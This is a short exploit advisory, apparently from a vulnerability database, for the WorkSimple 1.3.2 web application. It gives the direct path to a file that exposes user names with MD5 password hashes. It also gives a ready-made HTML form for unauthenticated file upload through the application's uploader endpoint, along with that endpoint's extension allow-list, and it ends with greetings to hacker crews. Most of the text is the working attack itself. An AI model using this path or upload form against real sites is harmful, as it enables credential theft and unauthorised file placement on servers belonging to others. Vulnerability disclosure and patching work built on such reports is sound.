worksimple_1.3.2 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

WorkSimple 1.3.2 Multiple Vulnerabilities - Password Disclosure & Remote File Uploa


                                                [ Multiple Remote Vulnerabilities ]
----------[Script Info]

Moi : JIKO
Site : No-exploit.Com
Email : mm :( Moghla9 Ferme Closed

----------[Script Info]

Name : WorkSimple
Site:http : http://geekness.eu/ or http://easton.4fd.us/
Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip

----------[exploit Info]

1]~[Password Disclosure Vulnerability]

For All Version

http://localhost/Path/data/secret.php

Name:Md5(Pass)

1]~[Remote File Upload Vulnerability]
file :/modules/uploader.php?startupload
array(&#34;.phps&#34;,&#34;.txt&#34;,&#34;.html&#34;,&#34;.png&#34;, &#34;.html&#34;, &#34;.htm&#34;,&#34;.jpg&#34;,&#34;.png&#34;, &#34;.bmp&#34;,&#34;.c&#34;,&#34;.cpp&#34;, &#34;.css&#34;, &#34;.h&#34;, &#34;.gif&#34;, &#34;.torrent&#34;, &#34;.jpeg&#34;);
---
&#60;form enctype=&#39;multipart/form-data&#39; action=&#39;[SITE]/modules/uploader.php?startupload&#39; method=&#39;post&#39;&#62;
&#60;input type=&#39;hidden&#39; name=&#39;MAX_FILE_SIZE&#39; value=&#39;500000&#39; /&#62;
Upload a file: &#60;input name=&#39;uploadedfile&#39; size=&#39;14&#39; type=&#39;file&#39; /&#62;
&#60;BR&#62;&#60;BR&#62;
&#60;input class=&#39;button&#39; type=&#39;submit&#39; value=&#39;upload&#39; /&#62;
&#60;/form&#62;
---

HxH, Cyb3r-DeViL, leopard, ZaIdOoHxHaCkEr, virusman, The Sadhacker,
Member No-exploit.Com

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1